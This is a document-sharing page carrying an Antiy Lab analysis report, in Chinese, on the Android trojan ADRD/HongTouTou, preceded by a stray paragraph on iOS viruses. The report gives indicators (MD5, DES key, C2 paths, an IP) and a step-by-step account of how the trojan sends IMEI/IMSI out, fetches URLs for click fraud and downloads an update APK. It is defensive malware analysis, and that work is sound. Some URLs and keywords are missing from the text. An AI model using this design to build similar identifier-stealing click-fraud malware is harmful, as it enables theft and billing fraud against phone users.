2.2 iOS系统病毒分析及解决iOS系统号称是一个比安卓安全的系统,但是在实际案例当中,iOS比安卓安全,那其实是快要成为笑柄的事情,iOS系统在历史中已经被爆出了大量严重的漏洞,在国内来看,很多的病毒都是针对中国用户,甚至在前段时间,iOS官方app的下载的应用程序都被爆出存在安全漏洞,在经历一次次的安全漏洞事件之后,iOS系统的安全神话已经不复存在了,研究iOS系统漏洞的黑客也越来越多,目前iOS系统上著名的病毒有WireLurker、YiSpecter、麦芽地等。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称:Trojan/Android.Adrd.a[Clicker]病毒别名: HongTouTou、ADRD病毒类型:木马样本MD5:A84997B0D220E6A63E2943DA64FFA38C样本CRC32:A42850DE样本长度:1,316,981 字节原始文件名:Newfpwap_com_liveprintslivewallpaper.apk出现时间:2011.01.27感染系统:Android 2.0及以上二、概述ADRD木马(又名HongTouTou木马)被植入十余款合法软件中(图1),通过多家论坛、下载站点分发下载实现大范围传播。
其主要行为包括:开启多项系统服务;每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息;接收控制服务器传回的指令;从数据服务器取回30个URL;依次访问这些URL,得到30个搜索引擎结果链接;在后台逐一访问这些链接;下载一个.apk安装文件到SD卡指定目录。
感染该木马的手机将产生大量网络数据流量,从而被收取流量费用。
攻击者通过增加搜索链接的访问量而获益。
用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马,并卸载相应软件将其清除。
图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布,安天已经检测到ADRD木马(又名HongTouTou木马)被植入到下列Android 软件:●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。
本报告涉及的样本中,ADRD木马被植入一款名为“动态脚印动态壁纸”(英文名“Live Prints Live Wallpaper”)的软件之中,于1月27日出现在国内所有主流手机论坛之中。
被植入软件包括两部分:1.正常程序liveprints:1)服务LivePrints:android.service.wallpaper.WallpaperService2)Activity:.LivePrintsSettings2.恶意代码com.xxx.yyy:1)接收器com.xxx.yyy.MyBoolService,用于启动(android.intent.action.BOOT_COMPLETED)2)接收器com.xxx.yyy.MyAlarmReceiver,自定义行为(com.lz.myservicestart)3)接收器WorkReceiver,响应网络状态变化(.conn.CONNECTIVITY_CHANGE)4)接收器com.xxx.yyy.CustomBroadCastReceiver,响应电话状态(android.intent.action.PHONE_STA TE)5)服务 com.xxx.yyy.MyService样本需要获取系统的以下权限(图2):图2 样本需要多项系统权限●读取通讯录数据●对Internet的完全访问●修改/删除SD卡的内容●读取和修改通话状态●写入APN(Access Point Name)设置●查看网络状态,查看Wi-Fi状态●开机时自动启动特征字符串包括:●/index.aspx?im=●/pic.aspx?im=●/●imeiimsi●myupdate.apk●UNINET●UNIWAP●cmnet●cmwap四、行为分析4.1接收器行为分析.xxx.yyy.MyBoolService木马通过这一接收器实现随系统开机而启动,然后发送com.lz.myservicestart广播消息,并设置一个2分钟后激活的Alarm。
.xxx.yyy.MyAlarmReceiver接收到com.lz.myservicestart广播后,启动MyService服务。
WorkReceiver检查phone_start中的started标志,以判断MyService服务是否启动。
如果没有,则将其启动。
.xxx.yyy.CustomBroadCastReceiver当通话状态变为空闲(即通话结束),修改phone_start中的started标志状态为启动,并启动MyService 服务。
5.MyServiceMyService启动后,首先尝试获取手机的IMEI和IMSI码。
如果获取失败,等待6分钟后再次尝试。
下一步,查看网络连接状态。
如果没有连接,则尝试打开网络连接。
如果连接失败,则等待6分钟后再次尝试。
访问APN设置中的配置信息,将其与”UNINET”、”UNIWAP”、”cmnet”、”cmwap”进行比较,以判断连接类型。
下一步,检查update_flag.xml中oldtime字段保存的样本上一次与控制服务器通信的时间,如果距离现在已经超过6小时,则搜集本机信息,再次向控制服务器发送数据,并更新oldtime(图3)。
图3 样本每6小时向控制服务器发起连接图4 主要恶意行为示意图4.2恶意行为分析该样本的主要恶意行为图4所示。
其中所有步骤均在后台运行,对用户不可见。
4.2.1向控制服务器发送IMEI/IMSI和版本信息MyService获取手机中的以下信息(图5):imei:被感染手机的IMEI码●imsi:被感染手机的IMSI码●iversion:样本版本,默认为1●oversion:被感染的Android系统版本●netway:取值1表示正常访问,取值0表示使用代理图5 获取IMEI和IMSI码接下来按下列方式和顺序构建一个明文字符串<string>:<string> = Imei + “&” + imsi + “&” + netway + “iversion” + “oversion”用DES算法对上述字符串加密(使用密钥“48734154”),得到密文字符串<enstring>。
然后将密文字符串与控制服务器地址组成一个完整的URL:/index.aspx?im=<enstring>最后,向这个URL发送一个HTTP POST请求,从而将加密了的手机IMEI、IMSI码和版本信息一起发送到控制服务器。
1.从控制服务器接收控制指令样本接收控制服务器的应答消息,应答的数据为DES加密的密文,使用密钥“48734154”解密,然后根据解密所得明文的第二个字符执行下一步操作:指令0:当前函数将后续字符串返回给调用函数;指令1:开始执行第3步(连接数据服务器);指令2:当前函数将后续字符串返回给调用函数;指令3:开始执行第8步(连接更新服务器)。
2.向数据服务器发送IMEI/IMSI按下列方式和顺序构建一个明文字符串<string>:<string> = Imei + “&” + imsi用DES算法对上述字符串加密(使用密钥“48734154”),得到密文字符串<enstring>。
然后将密文字符串与数据服务器地址组成一个完整的URL:/pic.aspx?im=<enstring>最后,向这个URL发送一个HTTP POST请求,从而将手机IMEI、IMSI码发送到数据服务器。
4.2.2从数据服务器接收URL列表样本接收数据服务器的应答消息,应答的数据为DES加密的密文,使用“48734154”解密,得到如下明文(中间部分省略):其中包含30条记录,以第一条记录为例,各字段含义为:需要指出的是,获取的这30条记录在多次分析中均保持稳定,与发送到数据服务器的IMEI、IMSI 码无关。
其中,我们将字符串gwurl称之为关键词服务器URL。
关键词服务器的IP地址为59.173.12.102,在这30条记录中,服务器网址还以的形式出现。
3.多次访问关键词服务器解析了30条记录后,样本获得30个不同的关键词服务器URL。
接下来,它以1秒一次的频率依次访问这些URL(在HTTP请求中,refer字段被设置为记录中的prul值)。
4.获得关键词和搜索链接关键词服务器返回给样本的数据具有如下形式:1|/s?word=%e8%9d%8e%e5%ad%90&vit=uni&from=963a_w1以“|”为分隔符,其中第二部分为搜索链接。
这一链接指向百度WAP版的一个搜索结果页面。
“%e8%9d%8e%e5%ad%90”是一串汉字对应的Unicode编码,也就是 在上述示例中,的搜索关键词。
在分析中,相同的关键词服务器URL访问将返回不同的关键词,并且这些关键词之间没有显著的相关性。
我们认为,这一关键词是由关键词服务器随机生成。
我们还注意到,在搜索链接中,出现了一个参数from,其值始终与对应关键词服务器URL中的w参数相同。
例如,这里的963a_w1(标识)就出现在上一节的示例之中。
另一方面,第4步获得的30个URL分别对应于30个标识,对这30个标识,关键词服务器将返回搜索链接;而对其他标识,关键词服务器返回结果为空。
因此,关键词服务器维护了这30个标识的列表,并对访问请求做校验。
这一在主要攻击流程中始终保持不变的标识信息具有重要含义。
5.访问搜索链接最后,样本将在系统后台访问搜索链接,下载该页面,从而造成大量的网络数据流量,而攻击者将得到一次对该链接的“点击”(图6)。
当样本将30个URL以每秒一个的频率依次完成5、6、7三步,则此次与控制服务器的交互最终完成。
相关线程退出,样本将等待6小时候后再次与控制服务器建立连接。
图6 访问搜索连接6.连接更新服务器当第2步由控制服务器发回的指令为3时,样本跳转到这一步执行。
它将访问一个用于更新的URL,该URL的值在指令之后附带。
在分析过程中,控制服务器始终没有发回指令3,因此无法得知更新服务器的地址。
我们认为这是样本的一种预留升级措施,目前尚未启用。
7.下载更新安装包样本访问更新服务器后,下载一个.apk安装文件,将其重命名为myupdate.apk,并保存在被感染手机SD卡的\sdcard\uc\目录下。
此外,样本将在update_flag.xml中添加is_new属性。
我们对样本的分析中,没有发现安装这个.apk文件的有关代码。
五、检测和清除方法用户可以下载安天实验室提供的Android恶意代码专查工具AScanner来查杀这一木马。